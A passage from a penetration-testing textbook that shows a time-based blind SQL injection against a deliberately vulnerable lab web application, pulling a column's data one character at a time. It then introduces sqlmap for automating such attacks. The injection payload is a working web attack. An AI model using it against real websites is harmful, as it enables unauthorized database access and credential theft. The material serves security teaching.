Web Hacking
◾
365
From
this screenshot, we can conclude that the password column exists in the database.
Extracting Data from Columns
Finally, we will try to enumerate the data present in the columns, again one character a time.
Along with the password column, there
also exists a username column, so we will try to enumerate
the username; you can do the same with the password. The syntax is as follows:
Syntax
http://192.168.75.147/peruggia/index.php?action=comment&pic_id=13&pic_id=13 and if((select
mid(column_name,1,1) from table_name limit 0,1)=’a’,sleep(5),1)--
366
◾
Ethical Hacking and Penetration Testing Guide
From this screenshot, you can see that our first query succeeded and the first character of the
username is “a”; the second query failed since the second character is not “a”. In this way, we can
extract
the entire username, “admin”. I will leave extracting the password to you.
Automating SQL Injections with Sqlmap
We talked about many types of SQL injection vulnerabilities and how to exploit them. You might
have realized by now that exploiting SQL injection sometimes can be a very tedious task; there-
fore, a better option is to use automated tools such as sqlmap.
Sqlmap is one of the best tools for exploiting SQL injection vulnerabilities. It supports many
databases and helps us not only to enumerate and extract database but
also to execute system com-
mands. I will discuss the basics of sqlmap and leave the rest for you to explore, since it includes a
huge
list of functions, which cannot be explained here.
We will use the same vulnerable application that was used for demonstrating UNION-based
and Boolean-based SQL injection.
Sqlmap can be found in the
/pentest/database/sqlmap
directory in BackTrack 5 R3.
This might differ based on what version of BackTrack you are using.
You can use the locate com-
mand to search for sqlmap. Once in the directory, execute the following command to launch the
sqlmap help menu.
Dostları ilə paylaş: